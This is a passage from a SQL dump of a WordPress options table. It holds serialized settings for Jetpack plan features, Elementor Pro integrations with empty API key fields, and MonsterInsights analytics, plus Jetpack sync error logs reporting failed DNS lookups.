tsapp-button\";i:20;s:25:\"social-image-auto-convert\";}s:9:\"available\";a:52:{s:7:\"akismet\";a:17:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:16:\"jetpack_personal\";i:3;s:23:\"jetpack_premium_monthly\";i:4;s:24:\"jetpack_business_monthly\";i:5;s:24:\"jetpack_personal_monthly\";i:6;s:22:\"jetpack_security_daily\";i:7;s:30:\"jetpack_security_daily_monthly\";i:8;s:25:\"jetpack_security_realtime\";i:9;s:33:\"jetpack_security_realtime_monthly\";i:10;s:16:\"jetpack_complete\";i:11;s:24:\"jetpack_complete_monthly\";i:12;s:29:\"jetpack_security_t1_bi_yearly\";i:13;s:26:\"jetpack_security_t1_yearly\";i:14;s:27:\"jetpack_security_t1_monthly\";i:15;s:26:\"jetpack_security_t2_yearly\";i:16;s:27:\"jetpack_security_t2_monthly\";}s:8:\"antispam\";a:17:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:16:\"jetpack_personal\";i:3;s:23:\"jetpack_premium_monthly\";i:4;s:24:\"jetpack_business_monthly\";i:5;s:24:\"jetpack_personal_monthly\";i:6;s:22:\"jetpack_security_daily\";i:7;s:30:\"jetpack_security_daily_monthly\";i:8;s:25:\"jetpack_security_realtime\";i:9;s:33:\"jetpack_security_realtime_monthly\";i:10;s:16:\"jetpack_complete\";i:11;s:24:\"jetpack_complete_monthly\";i:12;s:29:\"jetpack_security_t1_bi_yearly\";i:13;s:26:\"jetpack_security_t1_yearly\";i:14;s:27:\"jetpack_security_t1_monthly\";i:15;s:26:\"jetpack_security_t2_yearly\";i:16;s:27:\"jetpack_security_t2_monthly\";}s:7:\"backups\";a:17:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:16:\"jetpack_personal\";i:3;s:23:\"jetpack_premium_monthly\";i:4;s:24:\"jetpack_business_monthly\";i:5;s:24:\"jetpack_personal_monthly\";i:6;s:22:\"jetpack_security_daily\";i:7;s:30:\"jetpack_security_daily_monthly\";i:8;s:25:\"jetpack_security_realtime\";i:9;s:33:\"jetpack_security_realtime_monthly\";i:10;s:16:\"jetpack_complete\";i:11;s:24:\"jetpack_complete_monthly\";i:12;s:29:\"jetpack_security_t1_bi_yearly\";i:13;s:26:\"jetpack_security_t1_yearly\";i:14;s:27:\"jetpack_security_t1_monthly\";i:15;s:26:\"jetpack_security_t2_yearly\";i:16;s:27:\"jetpack_security_t2_monthly\";}s:13:\"backups-daily\";a:17:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:16:\"jetpack_personal\";i:3;s:23:\"jetpack_premium_monthly\";i:4;s:24:\"jetpack_business_monthly\";i:5;s:24:\"jetpack_personal_monthly\";i:6;s:22:\"jetpack_security_daily\";i:7;s:30:\"jetpack_security_daily_monthly\";i:8;s:25:\"jetpack_security_realtime\";i:9;s:33:\"jetpack_security_realtime_monthly\";i:10;s:16:\"jetpack_complete\";i:11;s:24:\"jetpack_complete_monthly\";i:12;s:29:\"jetpack_security_t1_bi_yearly\";i:13;s:26:\"jetpack_security_t1_yearly\";i:14;s:27:\"jetpack_security_t1_monthly\";i:15;s:26:\"jetpack_security_t2_yearly\";i:16;s:27:\"jetpack_security_t2_monthly\";}s:18:\"backups-self-serve\";a:17:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:16:\"jetpack_personal\";i:3;s:23:\"jetpack_premium_monthly\";i:4;s:24:\"jetpack_business_monthly\";i:5;s:24:\"jetpack_personal_monthly\";i:6;s:22:\"jetpack_security_daily\";i:7;s:30:\"jetpack_security_daily_monthly\";i:8;s:25:\"jetpack_security_realtime\";i:9;s:33:\"jetpack_security_realtime_monthly\";i:10;s:16:\"jetpack_complete\";i:11;s:24:\"jetpack_complete_monthly\";i:12;s:29:\"jetpack_security_t1_bi_yearly\";i:13;s:26:\"jetpack_security_t1_yearly\";i:14;s:27:\"jetpack_security_t1_monthly\";i:15;s:26:\"jetpack_security_t2_yearly\";i:16;s:27:\"jetpack_security_t2_monthly\";}s:8:\"calendly\";a:4:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";}s:20:\"cloudflare-analytics\";a:15:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";i:4;s:22:\"jetpack_security_daily\";i:5;s:30:\"jetpack_security_daily_monthly\";i:6;s:25:\"jetpack_security_realtime\";i:7;s:33:\"jetpack_security_realtime_monthly\";i:8;s:16:\"jetpack_complete\";i:9;s:24:\"jetpack_complete_monthly\";i:10;s:29:\"jetpack_security_t1_bi_yearly\";i:11;s:26:\"jetpack_security_t1_yearly\";i:12;s:27:\"jetpack_security_t1_monthly\";i:13;s:26:\"jetpack_security_t2_yearly\";i:14;s:27:\"jetpack_security_t2_monthly\";}s:14:\"cloudflare-cdn\";a:15:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";i:4;s:22:\"jetpack_security_daily\";i:5;s:30:\"jetpack_security_daily_monthly\";i:6;s:25:\"jetpack_security_realtime\";i:7;s:33:\"jetpack_security_realtime_monthly\";i:8;s:16:\"jetpack_complete\";i:9;s:24:\"jetpack_complete_monthly\";i:10;s:29:\"jetpack_security_t1_bi_yearly\";i:11;s:26:\"jetpack_security_t1_yearly\";i:12;s:27:\"jetpack_security_t1_monthly\";i:13;s:26:\"jetpack_security_t2_yearly\";i:14;s:27:\"jetpack_security_t2_monthly\";}s:10:\"core/audio\";a:17:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:16:\"jetpack_personal\";i:3;s:23:\"jetpack_premium_monthly\";i:4;s:24:\"jetpack_business_monthly\";i:5;s:24:\"jetpack_personal_monthly\";i:6;s:22:\"jetpack_security_daily\";i:7;s:30:\"jetpack_security_daily_monthly\";i:8;s:25:\"jetpack_security_realtime\";i:9;s:33:\"jetpack_security_realtime_monthly\";i:10;s:16:\"jetpack_complete\";i:11;s:24:\"jetpack_complete_monthly\";i:12;s:29:\"jetpack_security_t1_bi_yearly\";i:13;s:26:\"jetpack_security_t1_yearly\";i:14;s:27:\"jetpack_security_t1_monthly\";i:15;s:26:\"jetpack_security_t2_yearly\";i:16;s:27:\"jetpack_security_t2_monthly\";}s:10:\"core/cover\";a:4:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";}s:10:\"core/video\";a:4:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";}s:17:\"full-activity-log\";a:17:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:16:\"jetpack_personal\";i:3;s:23:\"jetpack_premium_monthly\";i:4;s:24:\"jetpack_business_monthly\";i:5;s:24:\"jetpack_personal_monthly\";i:6;s:22:\"jetpack_security_daily\";i:7;s:30:\"jetpack_security_daily_monthly\";i:8;s:25:\"jetpack_security_realtime\";i:9;s:33:\"jetpack_security_realtime_monthly\";i:10;s:16:\"jetpack_complete\";i:11;s:24:\"jetpack_complete_monthly\";i:12;s:29:\"jetpack_security_t1_bi_yearly\";i:13;s:26:\"jetpack_security_t1_yearly\";i:14;s:27:\"jetpack_security_t1_monthly\";i:15;s:26:\"jetpack_security_t2_yearly\";i:16;s:27:\"jetpack_security_t2_monthly\";}s:16:\"google-analytics\";a:15:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";i:4;s:22:\"jetpack_security_daily\";i:5;s:30:\"jetpack_security_daily_monthly\";i:6;s:25:\"jetpack_security_realtime\";i:7;s:33:\"jetpack_security_realtime_monthly\";i:8;s:16:\"jetpack_complete\";i:9;s:24:\"jetpack_complete_monthly\";i:10;s:29:\"jetpack_security_t1_bi_yearly\";i:11;s:26:\"jetpack_security_t1_yearly\";i:12;s:27:\"jetpack_security_t1_monthly\";i:13;s:26:\"jetpack_security_t2_yearly\";i:14;s:27:\"jetpack_security_t2_monthly\";}s:9:\"opentable\";a:4:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";}s:16:\"priority_support\";a:17:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:16:\"jetpack_personal\";i:3;s:23:\"jetpack_premium_monthly\";i:4;s:24:\"jetpack_business_monthly\";i:5;s:24:\"jetpack_personal_monthly\";i:6;s:22:\"jetpack_security_daily\";i:7;s:30:\"jetpack_security_daily_monthly\";i:8;s:25:\"jetpack_security_realtime\";i:9;s:33:\"jetpack_security_realtime_monthly\";i:10;s:16:\"jetpack_complete\";i:11;s:24:\"jetpack_complete_monthly\";i:12;s:29:\"jetpack_security_t1_bi_yearly\";i:13;s:26:\"jetpack_security_t1_yearly\";i:14;s:27:\"jetpack_security_t1_monthly\";i:15;s:26:\"jetpack_security_t2_yearly\";i:16;s:27:\"jetpack_security_t2_monthly\";}s:4:\"scan\";a:15:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";i:4;s:22:\"jetpack_security_daily\";i:5;s:30:\"jetpack_security_daily_monthly\";i:6;s:25:\"jetpack_security_realtime\";i:7;s:33:\"jetpack_security_realtime_monthly\";i:8;s:16:\"jetpack_complete\";i:9;s:24:\"jetpack_complete_monthly\";i:10;s:29:\"jetpack_security_t1_bi_yearly\";i:11;s:26:\"jetpack_security_t1_yearly\";i:12;s:27:\"jetpack_security_t1_monthly\";i:13;s:26:\"jetpack_security_t2_yearly\";i:14;s:27:\"jetpack_security_t2_monthly\";}s:15:\"scan-self-serve\";a:15:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";i:4;s:22:\"jetpack_security_daily\";i:5;s:30:\"jetpack_security_daily_monthly\";i:6;s:25:\"jetpack_security_realtime\";i:7;s:33:\"jetpack_security_realtime_monthly\";i:8;s:16:\"jetpack_complete\";i:9;s:24:\"jetpack_complete_monthly\";i:10;s:29:\"jetpack_security_t1_bi_yearly\";i:11;s:26:\"jetpack_security_t1_yearly\";i:12;s:27:\"jetpack_security_t1_monthly\";i:13;s:26:\"jetpack_security_t2_yearly\";i:14;s:27:\"jetpack_security_t2_monthly\";}s:15:\"simple-payments\";a:15:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";i:4;s:22:\"jetpack_security_daily\";i:5;s:30:\"jetpack_security_daily_monthly\";i:6;s:25:\"jetpack_security_realtime\";i:7;s:33:\"jetpack_security_realtime_monthly\";i:8;s:16:\"jetpack_complete\";i:9;s:24:\"jetpack_complete_monthly\";i:10;s:29:\"jetpack_security_t1_bi_yearly\";i:11;s:26:\"jetpack_security_t1_yearly\";i:12;s:27:\"jetpack_security_t1_monthly\";i:13;s:26:\"jetpack_security_t2_yearly\";i:14;s:27:\"jetpack_security_t2_monthly\";}s:28:\"subscriber-unlimited-imports\";a:17:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:16:\"jetpack_personal\";i:3;s:23:\"jetpack_premium_monthly\";i:4;s:24:\"jetpack_business_monthly\";i:5;s:24:\"jetpack_personal_monthly\";i:6;s:22:\"jetpack_security_daily\";i:7;s:30:\"jetpack_security_daily_monthly\";i:8;s:25:\"jetpack_security_realtime\";i:9;s:33:\"jetpack_security_realtime_monthly\";i:10;s:16:\"jetpack_complete\";i:11;s:24:\"jetpack_complete_monthly\";i:12;s:29:\"jetpack_security_t1_bi_yearly\";i:13;s:26:\"jetpack_security_t1_yearly\";i:14;s:27:\"jetpack_security_t1_monthly\";i:15;s:26:\"jetpack_security_t2_yearly\";i:16;s:27:\"jetpack_security_t2_monthly\";}s:7:\"support\";a:17:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:16:\"jetpack_personal\";i:3;s:23:\"jetpack_premium_monthly\";i:4;s:24:\"jetpack_business_monthly\";i:5;s:24:\"jetpack_personal_monthly\";i:6;s:22:\"jetpack_security_daily\";i:7;s:30:\"jetpack_security_daily_monthly\";i:8;s:25:\"jetpack_security_realtime\";i:9;s:33:\"jetpack_security_realtime_monthly\";i:10;s:16:\"jetpack_complete\";i:11;s:24:\"jetpack_complete_monthly\";i:12;s:29:\"jetpack_security_t1_bi_yearly\";i:13;s:26:\"jetpack_security_t1_yearly\";i:14;s:27:\"jetpack_security_t1_monthly\";i:15;s:26:\"jetpack_security_t2_yearly\";i:16;s:27:\"jetpack_security_t2_monthly\";}s:29:\"vaultpress-automated-restores\";a:4:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";}s:25:\"vaultpress-backup-archive\";a:4:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";}s:18:\"vaultpress-backups\";a:17:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:16:\"jetpack_personal\";i:3;s:23:\"jetpack_premium_monthly\";i:4;s:24:\"jetpack_business_monthly\";i:5;s:24:\"jetpack_personal_monthly\";i:6;s:22:\"jetpack_security_daily\";i:7;s:30:\"jetpack_security_daily_monthly\";i:8;s:25:\"jetpack_security_realtime\";i:9;s:33:\"jetpack_security_realtime_monthly\";i:10;s:16:\"jetpack_complete\";i:11;s:24:\"jetpack_complete_monthly\";i:12;s:29:\"jetpack_security_t1_bi_yearly\";i:13;s:26:\"jetpack_security_t1_yearly\";i:14;s:27:\"jetpack_security_t1_monthly\";i:15;s:26:\"jetpack_security_t2_yearly\";i:16;s:27:\"jetpack_security_t2_monthly\";}s:24:\"vaultpress-storage-space\";a:4:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";}s:13:\"video-hosting\";a:15:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";i:4;s:22:\"jetpack_security_daily\";i:5;s:30:\"jetpack_security_daily_monthly\";i:6;s:25:\"jetpack_security_realtime\";i:7;s:33:\"jetpack_security_realtime_monthly\";i:8;s:16:\"jetpack_complete\";i:9;s:24:\"jetpack_complete_monthly\";i:10;s:29:\"jetpack_security_t1_bi_yearly\";i:11;s:26:\"jetpack_security_t1_yearly\";i:12;s:27:\"jetpack_security_t1_monthly\";i:13;s:26:\"jetpack_security_t2_yearly\";i:14;s:27:\"jetpack_security_t2_monthly\";}s:10:\"videopress\";a:8:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:16:\"jetpack_personal\";i:3;s:23:\"jetpack_premium_monthly\";i:4;s:24:\"jetpack_business_monthly\";i:5;s:24:\"jetpack_personal_monthly\";i:6;s:16:\"jetpack_complete\";i:7;s:24:\"jetpack_complete_monthly\";}s:22:\"videopress-1tb-storage\";a:6:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";i:4;s:16:\"jetpack_complete\";i:5;s:24:\"jetpack_complete_monthly\";}s:16:\"videopress/video\";a:4:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";}s:7:\"wordads\";a:15:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";i:4;s:22:\"jetpack_security_daily\";i:5;s:30:\"jetpack_security_daily_monthly\";i:6;s:25:\"jetpack_security_realtime\";i:7;s:33:\"jetpack_security_realtime_monthly\";i:8;s:16:\"jetpack_complete\";i:9;s:24:\"jetpack_complete_monthly\";i:10;s:29:\"jetpack_security_t1_bi_yearly\";i:11;s:26:\"jetpack_security_t1_yearly\";i:12;s:27:\"jetpack_security_t1_monthly\";i:13;s:26:\"jetpack_security_t2_yearly\";i:14;s:27:\"jetpack_security_t2_monthly\";}s:15:\"wordads-jetpack\";a:15:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";i:4;s:22:\"jetpack_security_daily\";i:5;s:30:\"jetpack_security_daily_monthly\";i:6;s:25:\"jetpack_security_realtime\";i:7;s:33:\"jetpack_security_realtime_monthly\";i:8;s:16:\"jetpack_complete\";i:9;s:24:\"jetpack_complete_monthly\";i:10;s:29:\"jetpack_security_t1_bi_yearly\";i:11;s:26:\"jetpack_security_t1_yearly\";i:12;s:27:\"jetpack_security_t1_monthly\";i:13;s:26:\"jetpack_security_t2_yearly\";i:14;s:27:\"jetpack_security_t2_monthly\";}s:6:\"search\";a:4:{i:0;s:16:\"jetpack_business\";i:1;s:24:\"jetpack_business_monthly\";i:2;s:16:\"jetpack_complete\";i:3;s:24:\"jetpack_complete_monthly\";}s:18:\"google-my-business\";a:11:{i:0;s:16:\"jetpack_business\";i:1;s:24:\"jetpack_business_monthly\";i:2;s:25:\"jetpack_security_realtime\";i:3;s:33:\"jetpack_security_realtime_monthly\";i:4;s:16:\"jetpack_complete\";i:5;s:24:\"jetpack_complete_monthly\";i:6;s:29:\"jetpack_security_t1_bi_yearly\";i:7;s:26:\"jetpack_security_t1_yearly\";i:8;s:27:\"jetpack_security_t1_monthly\";i:9;s:26:\"jetpack_security_t2_yearly\";i:10;s:27:\"jetpack_security_t2_monthly\";}s:9:\"polldaddy\";a:2:{i:0;s:16:\"jetpack_business\";i:1;s:24:\"jetpack_business_monthly\";}s:15:\"personal-themes\";a:2:{i:0;s:16:\"jetpack_business\";i:1;s:24:\"jetpack_business_monthly\";}s:14:\"premium-themes\";a:2:{i:0;s:16:\"jetpack_business\";i:1;s:24:\"jetpack_business_monthly\";}s:17:\"real-time-backups\";a:11:{i:0;s:16:\"jetpack_business\";i:1;s:24:\"jetpack_business_monthly\";i:2;s:25:\"jetpack_security_realtime\";i:3;s:33:\"jetpack_security_realtime_monthly\";i:4;s:16:\"jetpack_complete\";i:5;s:24:\"jetpack_complete_monthly\";i:6;s:29:\"jetpack_security_t1_bi_yearly\";i:7;s:26:\"jetpack_security_t1_yearly\";i:8;s:27:\"jetpack_security_t1_monthly\";i:9;s:26:\"jetpack_security_t2_yearly\";i:10;s:27:\"jetpack_security_t2_monthly\";}s:10:\"stats-paid\";a:4:{i:0;s:16:\"jetpack_business\";i:1;s:24:\"jetpack_business_monthly\";i:2;s:16:\"jetpack_complete\";i:3;s:24:\"jetpack_complete_monthly\";}s:16:\"stats-commercial\";a:4:{i:0;s:16:\"jetpack_business\";i:1;s:24:\"jetpack_business_monthly\";i:2;s:16:\"jetpack_complete\";i:3;s:24:\"jetpack_complete_monthly\";}s:28:\"vaultpress-security-scanning\";a:2:{i:0;s:16:\"jetpack_business\";i:1;s:24:\"jetpack_business_monthly\";}s:12:\"ai-assistant\";a:2:{i:0;s:16:\"jetpack_complete\";i:1;s:24:\"jetpack_complete_monthly\";}s:15:\"ai-seo-enhancer\";a:2:{i:0;s:16:\"jetpack_complete\";i:1;s:24:\"jetpack_complete_monthly\";}s:18:\"cloud-critical-css\";a:2:{i:0;s:16:\"jetpack_complete\";i:1;s:24:\"jetpack_complete_monthly\";}s:20:\"cornerstone-10-pages\";a:2:{i:0;s:16:\"jetpack_complete\";i:1;s:24:\"jetpack_complete_monthly\";}s:10:\"field-file\";a:2:{i:0;s:16:\"jetpack_complete\";i:1;s:24:\"jetpack_complete_monthly\";}s:14:\"image-cdn-liar\";a:2:{i:0;s:16:\"jetpack_complete\";i:1;s:24:\"jetpack_complete_monthly\";}s:17:\"image-cdn-quality\";a:2:{i:0;s:16:\"jetpack_complete\";i:1;s:24:\"jetpack_complete_monthly\";}s:19:\"image-size-analysis\";a:2:{i:0;s:16:\"jetpack_complete\";i:1;s:24:\"jetpack_complete_monthly\";}s:14:\"instant-search\";a:2:{i:0;s:16:\"jetpack_complete\";i:1;s:24:\"jetpack_complete_monthly\";}s:19:\"performance-history\";a:2:{i:0;s:16:\"jetpack_complete\";i:1;s:24:\"jetpack_complete_monthly\";}s:26:\"social-enhanced-publishing\";a:2:{i:0;s:16:\"jetpack_complete\";i:1;s:24:\"jetpack_complete_monthly\";}s:22:\"social-image-generator\";a:2:{i:0;s:16:\"jetpack_complete\";i:1;s:24:\"jetpack_complete_monthly\";}s:24:\"social-message-templates\";a:2:{i:0;s:16:\"jetpack_complete\";i:1;s:24:\"jetpack_complete_monthly\";}}}}','on'),(873707,'sharing-options','a:1:{s:6:\"global\";a:5:{s:12:\"button_style\";s:9:\"icon-text\";s:13:\"sharing_label\";s:11:\"Share this:\";s:10:\"open_links\";s:4:\"same\";s:4:\"show\";a:2:{i:0;s:4:\"post\";i:1;s:4:\"page\";}s:6:\"custom\";a:0:{}}}','yes'),(874433,'jp_sync_retry_after_sync','','off'),(877397,'elementor_notice','','yes'),(877398,'elementor_google_maps_api_key','','yes'),(877399,'elementor_pro_recaptcha_site_key','','yes'),(877400,'elementor_pro_recaptcha_secret_key','','yes'),(877401,'elementor_pro_recaptcha_v3_site_key','','yes'),(877402,'elementor_pro_recaptcha_v3_secret_key','','yes'),(877403,'elementor_pro_recaptcha_v3_threshold','0.5','yes'),(877404,'elementor_pro_facebook_app_id','','yes'),(877405,'elementor_pro_mailchimp_api_key','','yes'),(877406,'elementor_validate_api_data','','yes'),(877407,'elementor_pro_drip_api_token','','yes'),(877408,'elementor_pro_activecampaign_api_key','','yes'),(877409,'elementor_pro_activecampaign_api_url','','yes'),(877410,'elementor_pro_getresponse_api_key','','yes'),(877411,'elementor_pro_convertkit_api_key','','yes'),(877412,'elementor_pro_mailerlite_api_key','','yes'),(877413,'elementor_typekit-kit-id','','yes'),(877415,'elementor_unfiltered_files_upload','','yes'),(877416,'elementor_font_display','auto','yes'),(877417,'elementor_experiment-e_dom_optimization','default','yes'),(877418,'elementor_experiment-e_optimized_assets_loading','default','yes'),(877419,'elementor_experiment-e_optimized_css_loading','default','yes'),(877420,'elementor_experiment-e_font_icon_svg','default','yes'),(877421,'elementor_experiment-a11y_improvements','default','yes'),(877422,'elementor_experiment-e_import_export','default','yes'),(877423,'elementor_experiment-additional_custom_breakpoints','default','yes'),(877424,'elementor_experiment-landing-pages','default','yes'),(877425,'elementor_experiment-elements-color-picker','default','yes'),(877426,'elementor_experiment-admin-top-bar','default','yes'),(877427,'elementor_experiment-form-submissions','default','yes'),(877428,'elementor_experiment-video-playlist','default','yes'),(970024,'post_by_email_address43','NULL','yes'),(1114747,'widget_monsterinsights-popular-posts-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1114749,'monsterinsights_over_time','a:4:{s:17:\"installed_version\";s:5:\"8.2.0\";s:14:\"installed_date\";i:1636982610;s:13:\"installed_pro\";b:0;s:14:\"installed_lite\";i:1636982610;}','no'),(1114751,'monsterinsights_current_version','8.2.0','yes'),(1114752,'monsterinsights_settings','a:40:{s:22:\"enable_affiliate_links\";b:1;s:15:\"affiliate_links\";a:2:{i:0;a:2:{s:4:\"path\";s:4:\"/go/\";s:5:\"label\";s:9:\"affiliate\";}i:1;a:2:{s:4:\"path\";s:11:\"/recommend/\";s:5:\"label\";s:9:\"affiliate\";}}s:12:\"demographics\";i:1;s:12:\"ignore_users\";a:2:{i:0;s:13:\"administrator\";i:1;s:6:\"editor\";}s:19:\"dashboards_disabled\";i:0;s:13:\"anonymize_ips\";i:0;s:19:\"extensions_of_files\";s:34:\"doc,pdf,ppt,zip,xls,docx,pptx,xlsx\";s:18:\"subdomain_tracking\";s:0:\"\";s:16:\"link_attribution\";b:1;s:16:\"tag_links_in_rss\";b:1;s:12:\"allow_anchor\";i:0;s:16:\"add_allow_linker\";i:0;s:13:\"save_settings\";a:1:{i:0;s:13:\"administrator\";}s:12:\"view_reports\";a:2:{i:0;s:13:\"administrator\";i:1;s:6:\"editor\";}s:11:\"events_mode\";s:2:\"js\";s:13:\"tracking_mode\";s:4:\"gtag\";s:15:\"email_summaries\";s:2:\"on\";s:23:\"summaries_html_template\";s:3:\"yes\";s:25:\"summaries_email_addresses\";a:1:{i:0;a:1:{s:5:\"email\";s:24:\"contact@ekmsliberia.info\";}}s:17:\"automatic_updates\";s:4:\"none\";s:26:\"popular_posts_inline_theme\";s:5:\"alpha\";s:26:\"popular_posts_widget_theme\";s:5:\"alpha\";s:28:\"popular_posts_products_theme\";s:5:\"alpha\";s:30:\"popular_posts_inline_placement\";s:6:\"manual\";s:34:\"popular_posts_widget_theme_columns\";s:1:\"2\";s:36:\"popular_posts_products_theme_columns\";s:1:\"2\";s:26:\"popular_posts_widget_count\";s:1:\"4\";s:28:\"popular_posts_products_count\";s:1:\"4\";s:38:\"popular_posts_widget_theme_meta_author\";s:2:\"on\";s:36:\"popular_posts_widget_theme_meta_date\";s:2:\"on\";s:40:\"popular_posts_widget_theme_meta_comments\";s:2:\"on\";s:39:\"popular_posts_products_theme_meta_price\";s:2:\"on\";s:40:\"popular_posts_products_theme_meta_rating\";s:2:\"on\";s:39:\"popular_posts_products_theme_meta_image\";s:2:\"on\";s:32:\"popular_posts_inline_after_count\";s:3:\"150\";s:36:\"popular_posts_inline_multiple_number\";s:1:\"3\";s:38:\"popular_posts_inline_multiple_distance\";s:3:\"250\";s:39:\"popular_posts_inline_multiple_min_words\";s:3:\"100\";s:31:\"popular_posts_inline_post_types\";a:1:{i:0;s:4:\"post\";}s:31:\"popular_posts_widget_post_types\";a:1:{i:0;s:4:\"post\";}}','yes'),(1114841,'jp_sync_last_success_sync','1782103447.0435','off'),(1114843,'newsletter_system','a:0:{}','yes'),(1114864,'pods_framework_upgraded_1_x','2','yes'),(1114907,'wisdom_notification_times','a:1:{s:4:\"pods\";i:1636982774;}','yes'),(1117868,'wpeft_types','a:8:{s:3:\"txt\";s:10:\"text/plain\";s:2:\"7z\";s:27:\"application/x-7z-compressed\";s:3:\"bz2\";s:19:\"application/x-bzip2\";s:2:\"gz\";s:18:\"application/x-gzip\";s:3:\"tgz\";s:18:\"application/x-gzip\";s:3:\"txz\";s:16:\"application/x-xz\";s:2:\"xz\";s:16:\"application/x-xz\";s:3:\"zip\";s:15:\"application/zip\";}','yes'),(1117869,'wpeft_custom_types','','yes'),(1136832,'jp_sync_error_log_sync','a:5:{s:15:\"1761930210.7843\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:19:\"http_request_failed\";a:1:{i:0;s:59:\"cURL error 6: Could not resolve host: jetpack.wordpress.com\";}}s:10:\"error_data\";a:1:{s:19:\"http_request_failed\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:19:\"http_request_failed\";a:1:{i:0;s:59:\"cURL error 6: Could not resolve host: jetpack.wordpress.com\";}}s:10:\"error_data\";a:0:{}s:18:\"\0*\0additional_data\";a:0:{}}}s:18:\"\0*\0additional_data\";a:1:{s:19:\"http_request_failed\";a:1:{i:0;i:-10520;}}}s:15:\"1764325672.8439\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:19:\"http_request_failed\";a:1:{i:0;s:59:\"cURL error 6: Could not resolve host: jetpack.wordpress.com\";}}s:10:\"error_data\";a:1:{s:19:\"http_request_failed\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:19:\"http_request_failed\";a:1:{i:0;s:59:\"cURL error 6: Could not resolve host: jetpack.wordpress.com\";}}s:10:\"error_data\";a:0:{}s:18:\"\0*\0additional_data\";a:0:{}}}s:18:\"\0*\0additional_data\";a:1:{s:19:\"http_request_failed\";a:1:{i:0;i:-10520;}}}s:15:\"1765016953.0514\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:19:\"http_request_failed\";a:1:{i:0;s:59:\"cURL error 6: Could not resolve host: jetpack.wordpress.com\";}}s:10:\"error_data\";a:1:{s:19:\"http_request_failed\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:19:\"http_request_failed\";a:1:{i:0;s:59:\"cURL error 6: Could not resolve host: jetpack.wordpress.com\";}}s:10:\"error_data\";a:0:{}s:18:\"\0*\0additional_data\";a:0:{}}}s:18:\"\0*\0additional_data\";a:1:{s:19:\"http_request_failed\";a:1:{i:0;i:-10520;}}}s:15:\"1772188111.5772\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:19:\"http_request_failed\";a:1:{i:0;s:59:\"cURL error 6: Could not resolve host: jetpack.wordpress.com\";}}s:10:\"error_data\";a:1:{s:19:\"http_request_failed\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:19:\"http_request_failed\";a:1:{i:0;s:59:\"cURL error 6: Could not resolve host: 